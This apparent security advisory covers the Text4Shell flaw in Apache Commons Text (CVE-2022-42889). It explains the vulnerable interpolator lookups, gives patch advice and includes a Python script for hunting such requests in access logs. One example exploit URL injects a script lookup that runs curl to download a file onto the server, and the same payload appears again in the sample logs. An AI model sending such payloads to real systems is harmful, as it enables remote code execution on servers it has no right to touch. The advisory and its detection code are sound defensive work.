Threat Summary
CVE-2022-42889, dubbed “Text4Shell”, was publicly disclosed in early October. Text4Shell is a vulnerability that affects Apache Commons Text, a Java library described by its creators as “focused on algorithms working on strings”. CVE-2022-42889 can result in remote code execution, which would allow an attacker to execute arbitrary code on victim machines and perform further actions on objectives. The vulnerability is rated 9.8 on the CVSS severity scale and is therefore deemed ‘critical’. The affected versions of Apache Commons Text are 1.5 through 1.9; the vulnerability has been patched in the latest version as of this writing, which is 1.10.
While Text4Shell boasts a high CVSS score of 9.8 and carries a name similar to Log4Shell and other impactful vulnerabilities disclosed in recent years, researchers argue that the similarities between the vulnerabilities are not as striking as initially thought. According to Rapid7, the nature of Text4Shell means that, unlike Log4Shell, it will be rare for an application to use the vulnerable component of Apache Commons Text to process untrusted, potentially malicious input (Rapid7, 2022). This does not mean the vulnerability is not serious, but rather that it is not on the same level as Log4Shell (CVE-2021-44228), a remote code execution vulnerability identified in the Apache Log4j2 framework that garnered a CVSS severity rating of 10.
That being said, Text4Shell does not appear to pose a greater impact than the similarly named “*4Shell” vulnerabilities that preceded it, such as Log4Shell or Spring4Shell. It is nonetheless recommended to update vulnerable Apache Commons Text versions.
Threat Synopsis – Text4Shell Ransomware
The identification of Text4Shell, or CVE-2022-42889, in October 2022 almost immediately piqued the interest of security professionals and created a stir throughout the community, as organizations and researchers alike rushed to determine whether this new “4Shell” vulnerability was as widespread and damaging as its predecessors. The Text4Shell vulnerability enables attackers to perform remote code execution via string substitutions carried out during script, dns, or url string lookups, a method similar to that of the dangerous Log4Shell (CVE-2021-44228) vulnerability, a remote code execution vulnerability identified in the Apache Log4j2 framework in late 2021.
The vulnerability specifically resides within the StringSubstitutor interpolator object of Apache Commons Text. This interpolator is created by the StringSubstitutor.createInterpolator() method and contains a logic flaw that allows the “script”, “dns”, and “url” string lookups to be interpolated by default, which can lead to arbitrary code execution. Successful exploitation of this vulnerability can allow actors to perform a myriad of actions on objectives, one example being opening a reverse shell from the vulnerable application via a specially crafted payload, providing attackers a foothold from which to launch further attacks.
In order to exploit this vulnerability, an attacker must first ensure that the targeted server is running a version of Apache Commons Text between 1.5 and 1.9 and that the application uses the StringSubstitutor interpolator. If these conditions are met, an attacker can send crafted HTTP requests containing a URL-encoded payload to the vulnerable server. An example of an exploitation attempt URL could be:
hxxp://vulnerableServer.com/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava%2Elang%2ERuntime%2EgetRuntime%28%29%2Eexec%28%27curl%20https%3A%2F%2Fcyborgsecurity%2Ecom%2Ffake%2Fdirectory%2Fmalware%2Ebin%20%2Do%20legitfile%2Ebin%27%29%7D
This request would execute curl on the vulnerable server to download a file; the attacker could then send an additional command to execute the downloaded file.
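The request pattern above is something a defender can hunt for in web server access logs. The following Python script is an added example for this summary; it is not part of the original page and is not code from Apache Commons Text. It assumes common/combined-format access-log lines, and the log lines it scans are constructed samples (the first reuses the encoded payload shown above; the IP addresses are documentation-range placeholders). It decodes each request target, including double-encoded parameters and lookups placed in the path rather than the query string, and flags the three interpolator prefixes named above.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# The three interpolator lookups that CVE-2022-42889 exposes by default in
# Apache Commons Text 1.5 through 1.9 (named in the summary above).
# Matching is case-insensitive so that hunting does not miss mixed-case prefixes.
LOOKUP_RE = re.compile(r"\$\{(script|dns|url):", re.IGNORECASE)

# Minimal parser for common/combined access-log lines (assumed log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding; a double-encoded payload still looks
    harmless after a single decode pass, so decode until the text stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_lookups(request_target):
    """Return (lookup_name, decoded_text) pairs for every interpolator
    prefix found in the request path or in any query-string value."""
    parts = urlsplit(request_target)
    candidates = [parts.path]
    candidates += [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    hits = []
    for candidate in candidates:
        decoded = fully_decode(candidate)
        for match in LOOKUP_RE.finditer(decoded):
            hits.append((match.group(1).lower(), decoded))
    return hits


def scan_log(lines):
    """Scan access-log lines and return one alert dict per lookup hit."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        for lookup, decoded in find_lookups(m.group("target")):
            alerts.append({
                "src": m.group("ip"),
                "time": m.group("ts"),
                "status": m.group("status"),
                "lookup": lookup,
                "decoded": decoded,
            })
    return alerts


# Constructed sample log lines. The first reuses the encoded payload from the
# summary above; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.10 - - [18/Oct/2022:14:02:11 +0000] "GET /text4shell/attack?search='
    '%24%7Bscript%3Ajavascript%3Ajava%2Elang%2ERuntime%2EgetRuntime%28%29%2Eexec%28'
    '%27curl%20https%3A%2F%2Fcyborgsecurity%2Ecom%2Ffake%2Fdirectory%2Fmalware%2Ebin'
    '%20%2Do%20legitfile%2Ebin%27%29%7D HTTP/1.1" 200 512',
    '198.51.100.7 - - [18/Oct/2022:14:02:15 +0000] "GET /text4shell/attack?search=hello%20world HTTP/1.1" 200 128',
    # Double-encoded dns lookup: a single decode pass still looks harmless.
    '203.0.113.10 - - [18/Oct/2022:14:03:40 +0000] "GET /api?q=%2524%257Bdns%253Aaddress%253Aexample.com%257D HTTP/1.1" 200 64',
    # Lookup placed in the path rather than in a query parameter.
    '203.0.113.10 - - [18/Oct/2022:14:04:02 +0000] "GET /%24%7Burl%3AUTF-8%3Ahttp%3A%2F%2Fexample.com%7D/index HTTP/1.1" 404 0',
    'garbage line that does not parse',
]


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['time']} {alert['src']} {alert['lookup']:6} "
              f"{alert['status']} {alert['decoded']}")
```

A hit is a hunting lead rather than proof of compromise: as the summary notes, the application must actually pass the parameter to an interpolating StringSubstitutor for the lookup to run, so each alert should be checked against the application's use of Apache Commons Text and its version.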
While the newly discovered vulnerability shares a similar name and functionality with the infamous Log4Shell vulnerability, there are major differences in its implementation and impact. Given the widespread usage of the Apache Log4j2 framework, even the most fundamental use cases are vulnerable to Log4Shell, whereas Text4Shell requires that Apache Commons Text be used and configured in a particular way that exposes the attack surface and leaves the vulnerability exploitable. According to Apache’s security team: “…This issue is different from Log4Shell (CVE-2021-44228) because in Log4Shell, string interpolation was possible from the log message body, which commonly contains untrusted input. In the Apache Common Text issue, the relevant method is explicitly intended and clearly documented to perform string interpolation, so it is much less likely that applications would inadvertently pass in untrusted input without proper validation.”
While exploitation attempts in the wild have been observed, they are expected to be limited in scope. It is recommended to ensure Apache Commons Text is patched to the latest available release (1.10 at the time of this writing), which resolves the vulnerability.